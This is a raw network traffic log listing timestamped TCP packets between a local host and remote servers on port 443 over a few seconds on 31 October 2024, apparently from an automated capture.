Oct 31, 2024 19:20:21.286339998 CET	443	51350	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:21.286526918 CET	51349	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:21.286546946 CET	443	51349	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:21.286559105 CET	51349	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:21.286565065 CET	443	51349	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:21.288060904 CET	51353	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:21.288095951 CET	443	51353	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:21.288176060 CET	51353	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:21.288400888 CET	51350	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:21.288415909 CET	443	51350	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:21.289050102 CET	51350	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:21.289055109 CET	443	51350	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:21.289338112 CET	51353	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:21.289354086 CET	443	51353	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:21.290522099 CET	51354	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:21.290551901 CET	443	51354	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:21.290626049 CET	51354	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:21.290726900 CET	51354	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:21.290740967 CET	443	51354	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:21.291949034 CET	443	51351	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:21.292263985 CET	51351	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:21.292279959 CET	443	51351	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:21.292687893 CET	51351	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:21.292695045 CET	443	51351	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:21.422688961 CET	443	51350	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:21.422764063 CET	443	51350	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:21.422874928 CET	51350	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:21.422890902 CET	443	51350	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:21.422955990 CET	51350	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:21.423229933 CET	51350	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:21.423245907 CET	443	51350	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:21.423255920 CET	51350	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:21.423260927 CET	443	51350	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:21.426724911 CET	51355	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:21.426742077 CET	443	51355	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:21.426842928 CET	51355	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:21.427045107 CET	51355	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:21.427059889 CET	443	51355	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:21.488379002 CET	51356	443	192.168.2.4	142.250.185.228
Oct 31, 2024 19:20:21.488411903 CET	443	51356	142.250.185.228	192.168.2.4
Oct 31, 2024 19:20:21.488487959 CET	51356	443	192.168.2.4	142.250.185.228
Oct 31, 2024 19:20:21.488784075 CET	51356	443	192.168.2.4	142.250.185.228
Oct 31, 2024 19:20:21.488797903 CET	443	51356	142.250.185.228	192.168.2.4
Oct 31, 2024 19:20:21.540669918 CET	443	51351	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:21.540893078 CET	443	51351	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:21.540962934 CET	51351	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:21.541023970 CET	51351	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:21.541044950 CET	443	51351	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:21.541055918 CET	51351	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:21.541063070 CET	443	51351	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:21.544300079 CET	51357	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:21.544337034 CET	443	51357	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:21.544434071 CET	51357	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:21.544611931 CET	51357	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:21.544624090 CET	443	51357	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:22.294953108 CET	443	51352	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:22.295248032 CET	443	51354	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:22.295321941 CET	443	51353	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:22.295551062 CET	51352	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:22.295578003 CET	443	51352	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:22.296055079 CET	51352	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:22.296061039 CET	443	51352	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:22.296292067 CET	51354	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:22.296299934 CET	443	51354	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:22.296663046 CET	51354	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:22.296668053 CET	443	51354	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:22.296828032 CET	51353	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:22.296837091 CET	443	51353	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:22.297167063 CET	51353	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:22.297171116 CET	443	51353	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:22.339596987 CET	443	51356	142.250.185.228	192.168.2.4
Oct 31, 2024 19:20:22.374265909 CET	51356	443	192.168.2.4	142.250.185.228
Oct 31, 2024 19:20:22.374305010 CET	443	51356	142.250.185.228	192.168.2.4
Oct 31, 2024 19:20:22.374916077 CET	443	51356	142.250.185.228	192.168.2.4
Oct 31, 2024 19:20:22.375226021 CET	51356	443	192.168.2.4	142.250.185.228
Oct 31, 2024 19:20:22.375299931 CET	443	51356	142.250.185.228	192.168.2.4
Oct 31, 2024 19:20:22.416445017 CET	51356	443	192.168.2.4	142.250.185.228
Oct 31, 2024 19:20:22.421837091 CET	443	51357	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:22.423074961 CET	443	51355	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:22.424587965 CET	443	51352	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:22.424666882 CET	443	51352	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:22.424747944 CET	51352	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:22.426326990 CET	443	51354	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:22.426351070 CET	443	51354	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:22.426392078 CET	443	51354	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:22.426429033 CET	51354	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:22.426467896 CET	51354	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:22.429622889 CET	443	51353	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:22.429697037 CET	443	51353	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:22.429749012 CET	51353	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:22.469701052 CET	51357	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:22.469716072 CET	443	51357	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:22.469746113 CET	51355	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:22.470244884 CET	51357	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:22.470248938 CET	443	51357	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:22.470422029 CET	51353	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:22.470438957 CET	443	51353	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:22.470465899 CET	51353	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:22.470470905 CET	443	51353	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:22.515080929 CET	51355	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:22.515090942 CET	443	51355	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:22.515609980 CET	51355	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:22.515614986 CET	443	51355	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:22.515816927 CET	51352	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:22.515816927 CET	51352	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:22.515847921 CET	443	51352	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:22.515857935 CET	443	51352	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:22.516880989 CET	51354	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:22.516885996 CET	443	51354	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:22.526017904 CET	51358	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:22.526056051 CET	443	51358	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:22.526124954 CET	51358	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:22.526261091 CET	51358	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:22.526269913 CET	443	51358	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:22.527210951 CET	51359	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:22.527232885 CET	443	51359	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:22.527286053 CET	51359	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:22.527892113 CET	51360	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:22.527930021 CET	443	51360	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:22.527996063 CET	51360	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:22.528110027 CET	51360	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:22.528125048 CET	443	51360	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:22.528198004 CET	51359	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:22.528208017 CET	443	51359	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:22.595963001 CET	443	51357	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:22.596035004 CET	443	51357	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:22.596179008 CET	51357	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:22.643589973 CET	443	51355	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:22.643721104 CET	443	51355	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:22.643913984 CET	51355	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:22.757332087 CET	51357	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:22.757343054 CET	443	51357	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:22.757379055 CET	51357	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:22.757384062 CET	443	51357	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:22.758441925 CET	51355	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:22.758451939 CET	443	51355	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:22.758465052 CET	51355	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:22.758470058 CET	443	51355	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:22.761811972 CET	51361	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:22.761837959 CET	443	51361	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:22.761953115 CET	51361	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:22.762670040 CET	51362	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:22.762713909 CET	443	51362	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:22.762803078 CET	51362	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:22.762836933 CET	51361	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:22.762857914 CET	443	51361	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:22.762927055 CET	51362	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:22.762934923 CET	443	51362	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:23.264177084 CET	443	51359	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:23.264722109 CET	51359	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:23.264751911 CET	443	51359	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:23.265208006 CET	51359	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:23.265213013 CET	443	51359	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:23.267463923 CET	443	51358	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:23.267894983 CET	51358	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:23.267914057 CET	443	51358	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:23.268307924 CET	51358	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:23.268316984 CET	443	51358	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:23.274610043 CET	443	51360	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:23.274950981 CET	51360	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:23.274966955 CET	443	51360	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:23.275331020 CET	51360	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:23.275336027 CET	443	51360	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:23.395899057 CET	443	51359	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:23.395986080 CET	443	51359	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:23.396043062 CET	51359	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:23.396291971 CET	51359	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:23.396316051 CET	443	51359	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:23.396339893 CET	51359	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:23.396348000 CET	443	51359	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:23.399528027 CET	443	51358	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:23.399568081 CET	443	51358	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:23.399614096 CET	51358	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:23.399630070 CET	443	51358	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:23.399674892 CET	51358	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:23.400988102 CET	51363	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:23.401041031 CET	443	51363	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:23.401060104 CET	51358	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:23.401077986 CET	443	51358	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:23.401088953 CET	51358	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:23.401096106 CET	443	51358	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:23.401222944 CET	51363	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:23.402987003 CET	51363	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:23.403004885 CET	443	51363	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:23.404643059 CET	51364	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:23.404685974 CET	443	51364	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:23.404884100 CET	51364	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:23.404969931 CET	51364	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:23.404983997 CET	443	51364	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:23.408575058 CET	443	51360	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:23.408655882 CET	443	51360	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:23.408721924 CET	51360	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:23.411144018 CET	51360	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:23.411159992 CET	443	51360	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:23.411199093 CET	51360	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:23.411204100 CET	443	51360	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:23.413943052 CET	51365	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:23.413966894 CET	443	51365	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:23.414035082 CET	51365	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:23.414218903 CET	51365	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:23.414227009 CET	443	51365	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:23.495562077 CET	443	51361	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:23.496146917 CET	51361	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:23.496162891 CET	443	51361	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:23.496748924 CET	51361	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:23.496753931 CET	443	51361	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:23.506011009 CET	443	51362	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:23.506402969 CET	51362	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:23.506422043 CET	443	51362	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:23.506830931 CET	51362	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:23.506836891 CET	443	51362	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:23.624264002 CET	443	51361	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:23.624294043 CET	443	51361	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:23.624341965 CET	443	51361	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:23.624481916 CET	51361	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:23.624886990 CET	51361	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:23.624886990 CET	51361	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:23.624913931 CET	443	51361	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:23.624923944 CET	443	51361	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:23.629875898 CET	51366	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:23.629914999 CET	443	51366	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:23.630011082 CET	51366	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:23.630199909 CET	51366	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:23.630213976 CET	443	51366	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:23.638468027 CET	443	51362	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:23.638535023 CET	443	51362	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:23.638606071 CET	51362	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:23.638789892 CET	51362	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:23.638789892 CET	51362	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:23.638806105 CET	443	51362	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:23.638817072 CET	443	51362	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:23.642519951 CET	51367	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:23.642554998 CET	443	51367	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:23.642649889 CET	51367	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:23.643255949 CET	51367	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:23.643270969 CET	443	51367	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:24.132744074 CET	443	51364	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:24.142208099 CET	51364	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:24.142241955 CET	443	51364	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:24.142724991 CET	51364	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:24.142735004 CET	443	51364	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:24.142870903 CET	443	51365	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:24.144330025 CET	51365	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:24.144362926 CET	443	51365	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:24.144797087 CET	51365	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:24.144804001 CET	443	51365	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:24.149168968 CET	443	51363	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:24.149657011 CET	51363	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:24.149674892 CET	443	51363	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:24.150115967 CET	51363	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:24.150120974 CET	443	51363	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:24.266344070 CET	443	51364	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:24.266443014 CET	443	51364	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:24.266508102 CET	51364	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:24.266721010 CET	51364	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:24.266721010 CET	51364	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:24.266743898 CET	443	51364	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:24.266755104 CET	443	51364	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:24.270343065 CET	51368	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:24.270385027 CET	443	51368	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:24.270688057 CET	51368	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:24.270891905 CET	51368	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:24.270906925 CET	443	51368	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:24.272766113 CET	443	51365	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:24.272830009 CET	443	51365	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:24.272872925 CET	443	51365	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:24.272890091 CET	51365	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:24.272922993 CET	51365	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:24.272981882 CET	51365	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:24.273003101 CET	443	51365	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:24.273015976 CET	51365	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:24.273022890 CET	443	51365	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:24.275329113 CET	51369	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:24.275362015 CET	443	51369	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:24.275480986 CET	51369	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:24.275672913 CET	51369	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:24.275687933 CET	443	51369	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:24.286148071 CET	443	51363	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:24.286214113 CET	443	51363	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:24.286302090 CET	51363	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:24.286524057 CET	51363	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:24.286549091 CET	443	51363	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:24.286597013 CET	51363	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:24.286604881 CET	443	51363	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:24.289063931 CET	51370	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:24.289078951 CET	443	51370	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:24.289139986 CET	51370	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:24.289277077 CET	51370	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:24.289304018 CET	443	51370	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:24.376813889 CET	443	51366	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:24.377399921 CET	51366	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:24.377418995 CET	443	51366	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:24.378119946 CET	51366	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:24.378125906 CET	443	51366	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:24.427473068 CET	443	51367	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:24.471263885 CET	51367	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:24.488235950 CET	51367	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:24.488265038 CET	443	51367	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:24.488800049 CET	51367	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:24.488809109 CET	443	51367	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:24.507643938 CET	443	51366	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:24.508030891 CET	443	51366	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:24.508186102 CET	51366	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:24.508186102 CET	51366	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:24.508186102 CET	51366	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:24.512465954 CET	51371	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:24.512495995 CET	443	51371	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:24.512756109 CET	51371	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:24.512911081 CET	51371	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:24.512932062 CET	443	51371	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:24.815063953 CET	51366	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:24.815097094 CET	443	51366	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:24.848035097 CET	443	51367	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:24.848128080 CET	443	51367	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:24.848205090 CET	51367	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:24.861530066 CET	51367	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:24.861561060 CET	443	51367	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:24.871073961 CET	51372	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:24.871123075 CET	443	51372	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:24.871190071 CET	51372	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:24.872200012 CET	51372	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:24.872222900 CET	443	51372	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:24.989906073 CET	443	51368	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:24.990592957 CET	51368	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:24.990627050 CET	443	51368	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:24.991293907 CET	51368	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:24.991302013 CET	443	51368	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:25.001774073 CET	443	51369	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:25.002233028 CET	51369	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:25.002260923 CET	443	51369	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:25.002954006 CET	51369	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:25.002959967 CET	443	51369	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:25.019330978 CET	443	51370	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:25.065043926 CET	51370	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:25.107238054 CET	51370	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:25.107253075 CET	443	51370	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:25.108223915 CET	51370	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:25.108230114 CET	443	51370	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:25.123950005 CET	443	51368	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:25.124023914 CET	443	51368	13.107.246.45	192.168.2.4
